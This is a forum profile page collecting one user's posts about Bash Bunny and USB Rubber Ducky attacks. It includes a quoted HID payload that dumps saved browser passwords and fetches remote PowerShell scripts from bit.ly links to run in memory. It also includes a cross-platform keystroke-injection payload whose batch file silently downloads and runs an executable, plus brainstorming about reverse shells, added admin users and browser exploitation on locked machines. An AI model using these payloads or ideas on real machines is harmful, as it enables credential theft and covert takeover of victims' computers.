Jump to content

Mohamed A. Baset

Active Members
 View Profile  See their activity

  • Posts

    38

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Posts posted by Mohamed A. Baset

    Captive Portal

    in Bash Bunny

    Posted

    21 minutes ago, Opticon said:

    @Mohamed A. Baset I can confirm that on an unlocked Windows box captive portal will automatically launch a browser and direct it to the "evil portal." I hope this helps you. As for Mac, it won't automatically launch a browser as it does in Windows.

    -Cheers!

    The idea is to do this on a locked machine not unlocked, I got the bunny days ago and tried the captive portal payload and i can confirm that the browser firing automatically scenario won't happen on any OS so this stopped my idea on exploiting a browser on a locked machine :)

    Thanks for your catch up @Opticon 

    Mega Thread: Bash Bunny Future Ideas

    in Bash Bunny

    Posted

    UPDATE: Future Bash Bunny 2.0 and Remote bluetooth controller, Plug it into a locked victim machine, once come back, in a glimpse send a command to act as a duck to implant reverse shell or add admin user, send another command to act as unknown device. Boom done.

    Many ideas here for sure!

    Wish you guys be more creative than me :D

    Locked Screen

    in Bash Bunny

    Posted

    3 hours ago, Decoy said:

    Open Regedit, and choose "Connect to Network Registry". Enter in the name/host of the PC you're trying to connect to and click Ok. Once you've connected, navigate to the remote PC registry, and go into Control Panel. From there you can do quite a few things. Good luck!

    regedit1.png

    regedit2.png

    regedit3.png

    Why you're talking about this as it's easy-peasy thing to do? :D

    There's a must-of a lot of requirements to be done before you will be able to remotely accessing a Windows Registry!

    Mega Thread: Bash Bunny Future Ideas

    in Bash Bunny

    Posted

    11 hours ago, Sebkinne said:

    I should clarify again, sorry. The portal most likely pops up, but you cannot interact with it. You could execute Javascript, download a file, etc, but no other interaction. 

    I thought the question was if it popped up visibly when locked. This also depends on OS. 

    Of course i know that captive portals won't show or popup on top of the lock screen :D but since it pops up in the background and the executed page is controlled by the Bash Bunny attacker then the first scenario mentioned in the original post is possible on one condition (if the bash bunny will be able to run Metasploit) then our captive portal url will be the final url of aux/browser_autopwn metasploit module which will exploit the machine's browser (default if found old) silently.

    What do you think?

    Violation of CoC

    in Payloads

    Posted

    13 minutes ago, illwill said:

    Was thinking of ways to dump browsercreds without the use Nirsoft programs, so screwing around with some powershell and some scripts i found that dump creds from Edge(IE)/Chrome/FireFox. I combined them into a HID attack that uses powershell to webdl the scripts into memory and execute and store the results \loot\BrowserCreds\%computername%.txt. 

    Tested on Win10 with Delays that worked for my laptop , so may need adjusting, let me know of any errors you come across

    https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt 

    
#!/bin/bash
#
# Title:         BrowserCreds
# Author:        illwill
# Version:       0.1
#
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire    Get-FoxDump.ps1

#script 
# Blue...............Running Script
# Purple.............Got Browser Creds


LED R 200
LOOTDIR=/root/udisk/loot/BrowserCreds
mkdir -p $LOOTDIR

ATTACKMODE HID STORAGE
LED B 200

# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100

#Dump Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| 
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100

#Dump Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 2000


#Open 32bit powershell and Dump Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
LED R B 200
sync

     

    Cool script @illwill but It's prefered to use 

    sync

    before 

    LEDding

     

    Mega Thread: Bash Bunny Future Ideas

    in Bash Bunny

    Posted

    Okay, as per @Sebkinne's clarification that the captive portals won't be able to open the web browser automatically while the machine is locked, What about combining both Samy Kamkar's PoisonTab and metasploit aux/browser_autopwn script (if the Bash Bunny will be able to hold metasploit run and steady) or running pre-plugging it in (the idea of the battery + bash bunny) to exploit the opened browser in the background which of course doing some ajaxed requests or any background activity (the idea of PoisonTab)?!!  :D

    Mega Thread: Bash Bunny Future Ideas

    in Bash Bunny

    Posted

    4 minutes ago, Just_a_User said:

    Another idea would be evilgrade - although Im not sure if this would be too obvious to the user if you plugged this in and update messages started to appear. But would perhaps be more effective once the bashbunny is combined to the wifi pineapple.

    https://github.com/infobyte/evilgrade

    Interesting!
    If captive portals fires automatically in the background on a locked machine then there will be unlimited forms of exploitation, I just want to be sure

    Mega Thread: Bash Bunny Future Ideas

    in Bash Bunny

    Posted · Edited by Mohamed A. Baset
    refreshing the thread

    HI Guys, 

    This topic is not about a problem in bash bunny or something more than discussing future ideas to make the bash bunny more malicious.

    1. What about installing Metasploit framework on the bunny and automatically launch it with aux/browser_autopwn with a proper payload and combining this scenario with captive_portal bunny payload, plug the bunny to a locked machine, the machine automatically launch the captive_portal which in fact is the browser_autopwn aux module link and take over the machine and the best part is "MACHINE IS LOCKED"!

    2. If time is not relevant because this requires time, then we can NMAP the $Target_IP, Get all the opened ports, Pass it to metasploit for auto pwning per service/opened port. 

    Just an ideas, Let me hear yours and Happy Bash Bunning....

    USB Rubber Ducky Cross-platform payload (Win 8.1 Eng, Win 7 Esp, and macOS Sierra 10.12.1 Eng)

    in Classic USB Rubber Ducky

    Posted

    Hi Guys, Hola Chicos

     

    Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, Automation stuff, etc..

    Long time ago i was working hard to get the ideal cross-platform payload which works:

    1. Cross-OSes

    2. Cross-keyboard layouts (not all of them currently)

    As we all know in a the rubber ducky dual mode (Keyboard + Mass storage) we can't *that easy* to get the drive letter dynamically and all you have to do to execute this command line:
      

    for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d

    This command line loops the current drives letters and finds the one which have the name "DUCKY" then assigns the variable "duck" to its drive letter, after that the %duck% variable will always be pointing to the USB Rubber Ducky drive letter.

    Cool! :grin:

    Simulating and Writing this command line on some OSes keyboard layouts is a big HEADACHE, Writing (', |, ", ^, etc..) is an Ughhhh a big mess, I wished that USB Rubber Ducky had a copy paste from any source but what we can do, it is a keyboard and we are functionally limited here!

    Spanish guys know about the big headache of pressing "AltGr" key to get some symbols like @#^ and the only way to simulate this is by modifying the kb layout and add some ascii codes and stuff then rewriting the ducky script etc.. so this topic is for you guys to jump over it, Cheers!

    The Windows part (Win 8.1 Eng & Win 7 Esp)
    So i came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout and for an extra fun I added some codes to achieve the same on macOS Sierra (a cool way to execute something from Ducky mass storage without the headache of the drive letter and later i will explain why), Here we go:
      

    DEFAULT_DELAY 75
DELAY 1000
WINDOWS r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING for %p in 
DELAY 10
SHIFT 8
STRING A B C D E F G H I J K L M N
DELAY 100
STRING  O P Q R S T U V W X Y Z
DELAY 10
SHIFT 9
DELAY 100
STRING do %p
DELAY 10
SHIFT .
SHIFT 7
STRING r.bat
ENTER
DELAY 100
STRING for %p in 
DELAY 100
STRING (A B C D E F G H I J K L M N
DELAY 100
STRING  O P Q R S T U V W X Y Z)
DELAY 100
STRING do %p:/r.bat
ENTER

    You guys don't need me for sure to explain each step but i will only explain the highlights:
    1. I'm looping (in a hard coded way) all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want)

    2. The loop mentioned above is executed twice, First on a Spanish (latin) keyboard layout and you can notice that when i used the "SHIFT 8" key combinations to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line: 

    for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat

     

    So, a "for" loop to execute a bat file and this loop will be executed twice (one time for english kb layout and the other is for the spanish kb layout)

    You can put anything inside this symbiansymoh.bat file but for satisfying your curiosity guys here's my content:
      

    @echo off
color 10
REM Getting our drive letter which have the name SYMB assign to symb
for /f %%d in ('wmic volume get driveletter^,  label ^| findstr "SYMB"')do set symb=%%d
REM Copy a NOTmalicious file to the temp folder
copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y
REM Executing the NOTmalicious file
start %tmp%\NOTmalicious.jar
REM Downloading and executing another NOTmalicious file
powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe"
REM Goodbye
exit

    It doesn't matter now what language the machine you're executing the bat file on.

     

    The macOS part (English KB Layout)

    The macOS part is the best and a kind of no brainer here, As you may know Linux, Unix and Linux/Unix-like OSes uses and identifies USB storages by its NAME not LETTER (There's nothing called letters in this beautiful and lovely world)

    So sending the key combinations to fire the spotlight search then opening the terminal is so freaking easy, then navigating to "/Volumes/[DRIVE_NAME]/", Giving the bash file "symbiansymoh.sh" the executing priveleges (Chmod +X) then executing it which also do ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste :grin: 

      

    DEFAULT_DELAY 75
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 100
ENTER
DELAY 500
STRING chmod +X  /Volumes/SYMB/symbiansymoh.sh
ENTER
DELAY 100
STRING nohup sh /Volumes/SYMB/symbioansymoh.sh &>/dev/null &
ENTER
DELAY 100
GUI q
DELAY 300
ENTER

    And again for feeding your curiosity here's the content of my symbiansymoh.sh file: 

    #!/bin/bash
rm -r /tmp/NOTmalicious.app;
cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app;
open /tmp/NOTmalicious.app;

    that copies a stored NOTmalicious.app file to the temp folder then executes it.

     

    Here's a PoC video demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI

    The topic is open to discussion, Any ideas, modification is always welcome!

    Cheers and have a great weekend guys!

×
×
  • Create New...